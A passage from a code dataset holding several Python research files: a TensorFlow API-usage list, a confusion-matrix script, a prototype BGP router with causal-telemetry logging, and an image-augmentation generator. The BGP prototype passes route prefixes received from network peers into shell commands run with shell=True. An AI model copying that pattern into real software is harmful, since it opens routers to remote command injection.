"attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.RMSprop", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 114, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.SGD", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.text.Tokenizer", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.sequence.pad_sequences", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 140, "usage_type": "attribute"}, {"api_name": "tensorflow.logical_not", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.math.equal", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 142, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.math.argmax", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.int64", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 175, "usage_type": "attribute"}, {"api_name": "tensorflow.math.count_nonzero", "line_number": 176, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 176, "usage_type": "attribute"}, {"api_name": "tensorflow.function", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 209, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 213, "usage_type": "call"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "time.time", "line_number": 256, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 264, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 270, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq.tile_batch", "line_number": 274, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 274, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 279, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.tile_batch", "line_number": 280, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 280, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.BeamSearchDecoder", "line_number": 283, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 283, "usage_type": "attribute"}, {"api_name": "tensorflow.round", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.fill", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 299, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 300, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 308, "usage_type": "call"}, {"api_name": "tensorflow.math.reduce_max", "line_number": 310, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 310, "usage_type": "attribute"}, {"api_name": "tensorflow.function", "line_number": 262, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 332, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 341, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 341, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 344, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 344, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 350, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 350, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 359, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 371, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 374, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LSTMCell", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.GRUCell", "line_number": 381, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 381, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.sampler.TrainingSampler", "line_number": 389, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 389, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.BasicDecoder", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 396, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.LuongAttention", "line_number": 402, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 402, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.BahdanauAttention", "line_number": 406, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 406, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.AttentionWrapper", "line_number": 412, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 412, "usage_type": "attribute"}]} +{"seq_id": "31027004904", "text": "import tifffile as tiff\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix,ConfusionMatrixDisplay\nimport os\nimport cv2\nimport pandas as pd\n\ndef graycode(arr):\n gray_image=cv2.cvtColor(arr,cv2.COLOR_BGR2GRAY)\n return gray_image \n\n\n\n\n\nprint(\"Enter path to Ground Truth\")#Ground truth annotation images\npath1=input()\nground_truth_path=os.path.abspath(path1)\nprint(\"Enter path to Predicted Image\")#Predicition from the models\npath2=input()\npredicted_image_path=os.path.abspath(path2)\nground_truth_image=tiff.imread(ground_truth_path)\npredicted_image=tiff.imread(predicted_image_path)\n#ground_truth_image=graycode(ground_truth_image)\n#predicted_image=graycode(predicted_image)\ntruth=ground_truth_image.flatten()\nprediction=predicted_image.flatten()\nprint(truth)\nprint(prediction)\nconfusionmatrix=confusion_matrix(truth,prediction,labels=[255,110,54,145,24])#[24,54,110,145,255]) Enter the labels corresponding to classes from 11.py\ncmd=ConfusionMatrixDisplay(confusionmatrix)#,display_labels=['24','54','110','112','115','154','255']) To plot the actual confusion matrix\nprint(confusionmatrix)\ncmd.plot()\nnp.savetxt('SFPap2.csv',confusionmatrix,delimiter=',')\n'''\n\nimg1=pd.read_csv('Predict/GT.csv',delimiter=',')\nimg2=pd.read_csv('Predict/Pred.csv',delimiter=',')\nimg1=img1.to_numpy().flatten()\nimg2=img2.to_numpy().flatten()\ncon=confusion_matrix(img1,img2)\ncon\nindex=['Wetlands','Settlements','Water','Saltpan','Mangrove','Forest','Open Land']\ncol=['Wetlands','Settlements','Water','Saltpan','Mangrove','Forest','Open Land']\ndf=pd.DataFrame(con,index,col)\ndf\nnp.savetxt('Prediction.csv',img1,delimiter=',')\nimg1'''", "repo_name": "rahulkotru/Semantic_Segmentation_Of_PolSAR_Images", "sub_path": "Data Postprocessing/12.py", "file_name": "12.py", "file_ext": "py", "file_size_in_byte": 1630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tifffile.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "11692880073", "text": "import sys \nimport argparse\nimport time\nimport socket\nimport select\nimport subprocess\nimport traceback\n\n\nclass RIBEntry():\n def __init__(self, prefix, next_hop, as_path, local_pref, selected):\n self.prefix = prefix\n self.next_hop = next_hop \n self.as_path = as_path \n self.local_pref = local_pref \n self.selected = selected\n def prefix(self): return self.prefix\n def next_hop(self): return self.next_hop\n def prefix(self): return self.prefix\n def as_path(self): return self.as_path\n def local_pref(self): return self.local_pref\n def selected(self): return self.selected\n\nclass TableKey:\n def __init__(self, prefix, next_hop): # ipaddrn and netmaskn as 32-bit integers\n self.prefix = prefix\n self.next_hop = next_hop\n def ipaddr(self): return self.prefix.split(\"/\")[0]\n def prefix(self): return self.prefix\n def next_hop(self): return self.next_hop\n def __hash__(self):\n return hash(self.prefix) ^ hash(self.next_hop)\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self.prefix == other.prefix and self.next_hop == other.next_hop\n else:\n return False \n def __str__(self):\n return f\"{self.prefix} + {self.next_hop}\"\n def __repr__(self):\n return f\"{self.prefix} + {self.next_hop}\"\n\n\n# arguments are ip address for subnet (announcements), neighbor IP addresses, and AS number. \n# can probably actually derive AS number from ip address\n# Opening hello message will also share AS number info \n\nBGP_PORT = 1179\nASN = 0\nSOURCE = \"\"\nSERVER_IP = \"192.168.0.100\"\n\n\n# have a table that has the key as the tablekey and the value as a RIBEntry.\nRIBTable = {}\nlocal_prefs = {}\nlogical_clock = 0\n\ndef set_keepalive_linux(sock:socket.socket, after_idle_sec=1, interval_sec=3, max_fails=2):\n \"\"\"Set TCP keepalive on an open socket.\n\n It activates after 1 second (after_idle_sec) of idleness,\n then sends a keepalive ping once every 3 seconds (interval_sec),\n and closes the connection after 5 failed ping (max_fails), or 15 seconds\n \"\"\"\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, after_idle_sec)\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, interval_sec)\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, max_fails)\n #sock.settimeout(.5)\n\n\ndef initiate_connections(neighbors):\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind(('', BGP_PORT))\n server_socket.listen()\n read_list = [server_socket]\n print(f\"ASN {ASN} created server Socket\")\n time.sleep(.2)\n client_sockets = []\n \n for (ip, server, local_pref) in neighbors:\n server = \"true\" in server\n print(f\"ASN {ASN} ip: {ip} server: {server}\")\n if not server:\n print(f\"ASN {ASN} about to connect to {ip}\")\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.connect((ip, BGP_PORT))\n\n client_sockets.append(client_socket)\n\n while True:\n readable, writable, errored = select.select(read_list, [], [], 1)\n if len(readable) == 0:\n break\n for s in readable:\n print(f\"ASN {ASN} about to accept\")\n client_socket, address = s.accept()\n client_sockets.append(client_socket)\n print(f\"ASN {ASN} was connected to\")\n \n print(f\"ASN {ASN} has {len(client_sockets)} sockets\")\n [set_keepalive_linux(sock) for sock in client_sockets]\n return client_sockets\n\ndef get_eventID():\n global logical_clock\n id = f\"{ASN},{logical_clock}\"\n logical_clock += 1\n return id\n\ndef replace_local_AS(message):\n new_msg = \"\"\n words = message.split(\" \")\n if \"disconnect\" in message or \"del\" in message:\n return message\n elif words[0] == \"internal\":\n idx = message.find(\"via\") + 4\n left = message[:idx]\n right = message[idx:]\n words = right.split(\" \")\n nums = words[0].split(\".\")\n words[0] = str(int(nums[int(nums[3])]) - 1)\n \n return left + \" \".join(words)\n else:\n nums = words[-2].split(\".\")\n words[-2] = nums[int(nums[3])]\n return \" \".join(words)\n\ndef send_server(message):\n causal_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n addr = (SERVER_IP, 55555)\n # sockname = sock.getsockname()[0]\n # nums = sockname.split(\".\")\n # next_hop = nums[nums[3]]\n message = replace_local_AS(message)\n causal_socket.sendto(message.encode(), addr)\n \ndef log_send(message):\n # every send message should embed the event ID, semi-colon seperated\n # eventID;message --> node_id,timestamp;message\n # wrap this around every sendall function message \n # after should embed the eventID into the message and then return the string with eventID;message\n # while also sending it to the server with the eventID and message\n eventID = get_eventID()\n new_message = f\"{eventID};{message}\"\n server_message = f\"send {eventID} {message}\"\n send_server(server_message)\n return new_message\n\ndef log_recv(updates):\n global logical_clock\n # eventID;message --> node_id,timestamp;message\n stripped_updates = []\n for update in updates:\n send_eventID, stripped_update = update.split(\";\")\n stripped_updates.append(stripped_update)\n message = f\"receive {send_eventID} {get_eventID()} {stripped_update}\"\n send_server(message)\n #logical_clock += 1\n # every receive should parse the embed event ID \n # TODO: grab the info I need and then strip it before returning it\n return stripped_updates\n\ndef log_internal(message):\n eventID = get_eventID()\n message = f\"internal {eventID} {message}\"\n send_server(message)\n\ndef read_updates(sock):\n # read until I end with a newline. Could have multiple requests\n while True:\n buffer = ''\n data = sock.recv(1024)\n if not data:\n pass\n #print(\"Disconnected\") #will this happen if link down? probably not. \n buffer += data.decode()\n if buffer.endswith(\"\\n\"):\n updates = buffer.split(\"\\n\")[:-1]\n return log_recv(updates)\n \ndef select_route(sockets, prefix, neighbor_from):\n global RIBTable\n\n if ASN == \"1\":\n print(f\"{ASN} selecting route from {RIBTable}\")\n\n keys = list(RIBTable.keys())\n keys = [key for key in keys if key.prefix == prefix]\n\n if not keys: #no routes\n # send withdrawal to neighbors\n for sock in sockets:\n if sock.getpeername()[0] != neighbor_from:\n message = f\"withdraw {prefix} {sock.getsockname()[0]} empty\\n\"\n message = log_send(message)\n sock.sendall(message.encode())\n return\n\n selected_route = [key for key in keys if RIBTable[key].selected] # invariant that at most one is selected at any time\n selected_route = selected_route[0] if selected_route else None\n\n best_key = keys[0]\n if ASN == \"3\":\n print(keys)\n for key in keys:\n route = RIBTable[key]\n best_route = RIBTable[best_key]\n\n if ASN == \"3\":\n print(f\"key: {key} local pref {route.local_pref} as_path: {route.as_path}\")\n # first check local_pref\n if route.local_pref != best_route.local_pref:\n if route.local_pref > best_route.local_pref:\n best_key = key\n elif len(route.as_path) < len(best_route.as_path): # then check as_path length\n best_key = key\n\n # if the best_route is the same as the previous selected route, don't need to update\n if RIBTable[best_key].selected:\n return \n\n if ASN == \"3\":\n print(f\"best route: {best_key}\")\n\n command = f\"ip route del {best_key.prefix}\"\n subprocess.run(command, shell=True)\n if selected_route:\n RIBTable[selected_route].selected = False\n RIBTable[best_key].selected = True\n print(f\"ASN {ASN} add route to {best_key.prefix} via {best_key.next_hop}\\n\")\n command = f\"ip route add {best_key.prefix} via {best_key.next_hop} src {SOURCE}\"\n subprocess.run(command, shell=True)\n log_internal(command)\n\n # send announcements for neighbors. \n for sock in sockets:\n if sock.getpeername()[0] != neighbor_from:\n as_path = \",\".join(RIBTable[best_key].as_path) + f\",{ASN}\"\n message = f\"update {prefix} {sock.getsockname()[0]} {as_path}\\n\"\n message = log_send(message)\n sock.sendall(message.encode())\n # TODO: remove current route to IP address in linux routing table (might have to do this before I over-write the route)\n # if selected_route exists then set selected to 0 \n # set best_key selected to 1\n # add best_key route to linux routing table\n # advertise best_key route to all neighbors, except for neighbor_from. Make sure to set neighbor correctly to be my own IP address, and add ASN to as_path\n\n\n\n\n # get all of the keys for that prefix\n \n # get the current selected route\n\n # calculate the best route. If it is not the current route (which if it's none will always be the case) then remove current route from linux routing table (assuming it's not none) and add new one\n # then advertise the new route to neighbors. \n # set old best route selected to 0 and new best route selected to 1. \n\n\n # if best route is empty (meaning no routes) then advertise withdrawal to neighbor sockets, except for neighbor_from. \n\n # in the case of update or withdraw it's possible one is already selected, so make sure to set that to 0 after selecting the right one\n # in the case of withdraw it's possible there are no longer any routes, in which case it should return -1 (returns 0 if successful)\n # in that case of no route, send a withdraw to all neighbors that are not the one that sent it originally (withdrawNeighbor)\n # if a route is updated, then send an update to everyone except for neighbor\n\n # after selecting route, if I have to make selected 0 for an entry, then remove it from linux routing\n # if I make select 1 for an entry, add it to linux routing\n\n \n\n\ndef route_filter(update): \n\n #localprefs\n\n # should probably make this a JSON input at some point\n vals = update.split(\" \")\n action = vals[0] #either update or withdraw\n prefix = vals[1]\n neighbor = vals[2]\n local_pref = local_prefs[neighbor]\n as_path = vals[3].split(\",\")\n if ASN in as_path:\n return None, None\n entry = RIBEntry(prefix, neighbor, as_path, local_pref, False)\n return entry, action\n\ndef process_updates(sockets, updates):\n global RIBTable\n # update looks like:\n # prefix neighbor as1,as2,as3 \n for update in updates:\n rib_entry, action = route_filter(update)\n if not rib_entry: # ASN was in the asn_path\n continue\n\n #prefix and next hop should be unique, so only one entry per those for withdraw and update should make sure to update THAT entry and not add a new one\n\n # I can just plug it into the table and set selected to 0. select_route will decide if it needs to send an update/withdraw and select the correct route. \n if action == \"update\":\n key = TableKey(rib_entry.prefix, rib_entry.next_hop)\n RIBTable[key] = rib_entry\n elif action == \"withdraw\":\n command = f\"ip route del {rib_entry.prefix}\"\n subprocess.run(command, shell=True)\n log_internal(command)\n key = TableKey(rib_entry.prefix, rib_entry.next_hop)\n print(f\"asn {ASN} withdraw route key: {key}\")\n if key in RIBTable:\n del RIBTable[key]\n else:\n print(f\"{ASN} tried to withdraw {key}, but not in table\")\n else:\n raise Exception(\"action not known\")\n\n select_route(sockets, rib_entry.prefix, rib_entry.next_hop)\n\n # for sending update can use socket.getsockname()\n\n # pass each update message through the filter to get local_pref\n # turn it into RIB entry data structure\n # if the prefix is new just add it to the RIB and linux routing table\n # if it's already in there, compare it to current selected and if it's better than replace it as selected and in linux routing table \n # if it's a withdraw, then remove the route and select a new one. \n # any time a new selected route is chosen, I should send an update message to neighbors, unless next_hop is that neighbor \n\n # need a way to test if the connection link went down, then should send a withdraw message to all neighbors (except for the down link one)\n\n\n # if a router changes its route it's just an update message. This has to clear the old entry (from the same AS), because it cant have two different paths to the same prefix from the same AS. \n # if a route goes down and there's no alternative, then it sends a withdrawal, until an AS has an alternative and it is propogated. \n \n\ndef main():\n # TODO: local pref has to be passed in as an argument\n global ASN\n global local_prefs\n global SOURCE\n global RIBTable\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--ip', type=str, required=True)\n parser.add_argument('--neighbor', nargs=3, action='append', type=str, required=True)\n\n\n args = parser.parse_args()\n\n ip = args.ip\n neighbors = args.neighbor\n print(f\"ip: {args.ip} \\nneighbors: {args.neighbor}\")\n\n\n for (ip_, server, local_pref) in neighbors: # set local_prefs\n local_prefs[ip_] = int(local_pref)\n\n\n ASN = ip.split(\".\")[2]\n SOURCE = ip[:-4] + \"1\"\n sockets = initiate_connections(neighbors)\n\n saved_addr = {}\n for sock in sockets:\n saved_addr[sock] = sock.getpeername()\n\n # prefix neighbor as1,as2,as3 \n\n # send announcements for neighbors. \n for sock in sockets:\n print(f\"socket name: {sock.getsockname()}\")\n addr = sock.getsockname()[0]\n message = f\"update {ip} {addr} {ASN}\\n\"\n message = log_send(message)\n sock.sendall(message.encode())\n time.sleep(.5)\n future = time.time() + 3\n sent = False\n # main loop for running BGP\n while True:\n read_sockets, write_sockets, error_sockets = select.select(sockets, [], [], .5)\n\n # print(\"SLKDJFKL:SDJKLFJS\")\n # # test for links down\n # for i, sock in enumerate(sockets):\n # try: \n # print(f\"{ASN} sock.getpeername()\")\n # except OSError as e:\n # print(f\"{saved_addr[sock]} disconnected\")\n\n # test for links down\n for i, sock in enumerate(read_sockets):\n try:\n data = sock.recv(1, socket.MSG_PEEK)\n except TimeoutError as e:\n print(f\"Socket {saved_addr[sock]} disconnected\")\n print(f\"socket {sock.getsockname()} \")\n # TODO: have to withdraw all the IP routes where next hop is this neighbor (get neighbor from saved_addr). In withdraw message the next_hop should be sock.getsockname()[0]\n #print(f\"{ASN} sending withdraw to {sock.getpeername()[0]} from {sock.getsockname()[0]} \")\n #message = f\"withdraw 10.0.2.0/24 {sock.getsockname()[0]} {ASN}\\n\"\n #sock.sendall(message.encode())\n print(list(RIBTable.keys())[0].next_hop)\n print(list(RIBTable.keys())[0].next_hop == saved_addr[sock][0])\n items = [(key, val) for (key, val) in RIBTable.items() if key.next_hop == saved_addr[sock][0]]\n sockets.remove(sock) # remove the socket\n print(items)\n\n for key, val in items:\n if val.selected: # if it's selected then need to remove from kernel routing table and RIBTable and call select route\n command = f\"ip route del {key.prefix}\"\n subprocess.run(command, shell=True)\n log_internal(\"disconnect: \" + command)\n del RIBTable[key]\n select_route(sockets, key.prefix, key.next_hop)\n else: # otherwise just need to remove it \n del RIBTable[key]\n\n # get all of the IP prefixes that neighbor was advertising from RIB. If any of the routes are selected, run select route on it after removing from table\n # remove the socket from the list. delete the route from the routing table and RIBTable\n # call select route\n\n # TODO: MRAI timer \n # have a queue of messages that are waiting on their timer and check them in this main loop \n # keep track of destinations in a queue and advertise current selected route after timer is done (or withdraw if there is none)\n \n\n\n for sock in read_sockets:\n updates = read_updates(sock)\n process_updates(sockets, updates)\n\n # test for links down\n # for sock in sockets:\n # try:\n # data = sock.recv(1)\n # print(f\"DATA: {data}\")\n # if data == b'':\n # print(f\"{ASN} CONNECTION FAILED\")\n # except TimeoutError:\n # print(\"continuing\")\n # continue\n \n\n \n\n # if ASN == \"3\" and time.time() > future and not sent:\n # print(f\"len sockets: {len(sockets)}\")\n # sock = sockets[1]\n # print(\"withdrawing route\")\n # sent = True\n # print(f\"{ASN} sending withdraw to {sock.getpeername()[0]} from {sock.getsockname()[0]} \")\n # message = f\"withdraw 10.0.2.0/24 {sock.getsockname()[0]} {ASN}\\n\"\n # sock.sendall(message.encode())\n\n #TODO: Send packets to central server for send, recieve, and internal events. Page 3 of causal telemetry paper\n # need to keep track of logical time-stamp ID and node ID (ASN). Re-read causal telemetry EuroP4 paper\n # TODO: Add to setup a hello message where the server can get the ASN and IP (10.x.x.x) of each router and put it into the space-time data structure\n # TODO: Change all sending to include the event ID (ASN and logical_clock). And also increase the logical_clock after each one, and also send it to the log (maybe have a log function)\n # TODO: Change all receive to parse the eventID and then add to the log. and increment logical clock\n # TODO: decide which internal events I want to log and make sure to increment logical clock\n\n # use select framework to read all the data. Use data format with \\n for messages to make parsing easy \n\n\n# once I get sockets, use select and polling framework. \n\n\n# handle the select polling of the socket connections \n # need to figure out what it looks like when a link goes down from socket POV\n # I think it's using the timeout\n # do I need MRAI timer? \n# upon update message receive need to change the RIB table and update kernel routing tables\n# then send out new update messages \n\n# FIB table:\n# IP announced, next hop, AS path, local pref, selected (bool)\n\n# MRAI timer:\n# dictionary with entry for each ip address prefix (make sure to remove when withdraw)\n# if I send an update, withdraw then don't update again until it's been 30 seconds. might need some fancy. or just a queue of waiting messages to send. \n\nif __name__ == \"__main__\":\n main()", "repo_name": "bennyrubin/CausalTelemetry", "sub_path": "src/simpleBGP.py", "file_name": "simpleBGP.py", "file_ext": "py", "file_size_in_byte": 19610, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "socket.socket", "line_number": 59, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 66, "usage_type": "attribute"}, {"api_name": "socket.SO_KEEPALIVE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 67, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPIDLE", "line_number": 67, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 68, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPINTVL", "line_number": 68, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 69, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPCNT", "line_number": 69, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 74, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 74, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 74, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 75, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 75, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 88, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 88, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 88, "usage_type": "attribute"}, {"api_name": "select.select", "line_number": 94, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 133, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 133, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 133, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 230, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 236, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 310, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 346, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 380, "usage_type": "call"}, {"api_name": "time.time", "line_number": 381, "usage_type": "call"}, {"api_name": "select.select", "line_number": 385, "usage_type": "call"}, {"api_name": "socket.MSG_PEEK", "line_number": 398, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 415, "usage_type": "call"}]} +{"seq_id": "11368089477", "text": "import torch\nimport torchvision.transforms as transforms\nimport random\n\ndef gamma_correction(x, gamma):\n minv = torch.min(x)\n x = x - minv\n\n maxv = torch.max(x)\n x = x / maxv\n\n x = x**gamma\n x = x * maxv + minv\n return x\n\ndef random_aug(x):\n # gamma correction\n if random.random() <= 0.3:\n gamma = random.uniform(1.0, 1.5)\n x = gamma_correction(x, gamma)\n # random erasing with mean value\n mean_v = tuple(x.view(x.size(0), -1).mean(-1))\n re = transforms.RandomErasing(p=0.5, value=mean_v)\n x = re(x)\n # color channel shuffle\n if random.random() <= 0.3:\n l = [0,1,2]\n random.shuffle(l)\n x_c = torch.zeros_like(x)\n x_c[l] = x\n x = x_c\n # horizontal flip or vertical flip\n if random.random() <= 0.5:\n if random.random() <= 0.5:\n x = torch.flip(x, [1])\n else:\n x = torch.flip(x, [2])\n # rotate 90, 180 or 270 degree\n if random.random() <= 0.5:\n degree = [90, 180, 270]\n d = random.choice(degree)\n x = torch.rot90(x, d//90, [1, 2])\n return x\n\nclass PseudoSampleGenerator(object):\n def __init__(self, n_way, n_support, n_pseudo):\n super(PseudoSampleGenerator, self).__init__()\n self.n_way = n_way\n self.n_support = n_support\n self.n_pseudo = n_pseudo\n self.n_pseudo_per_way = self.n_pseudo//self.n_way\n\n def generate(self, support_set): # (5*n_support, 3, 224, 224)\n times = self.n_pseudo//(self.n_way*self.n_support)+1\n psedo_list = []\n for i in range(support_set.size(0)):\n psedo_list.append(support_set[i])\n for j in range(1, times):\n cur_x = support_set[i]\n cur_x = random_aug(cur_x)\n psedo_list.append(cur_x)\n\n psedo_set = torch.stack(psedo_list)\n psedo_set = psedo_set.reshape([self.n_way, self.n_pseudo_per_way+self.n_support]+list(psedo_set.size()[1:]))\n return psedo_set", "repo_name": "Haoqing-Wang/CDFSL-ATA", "sub_path": "PSG.py", "file_name": "PSG.py", "file_ext": "py", "file_size_in_byte": 1990, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "61", "api": [{"api_name": 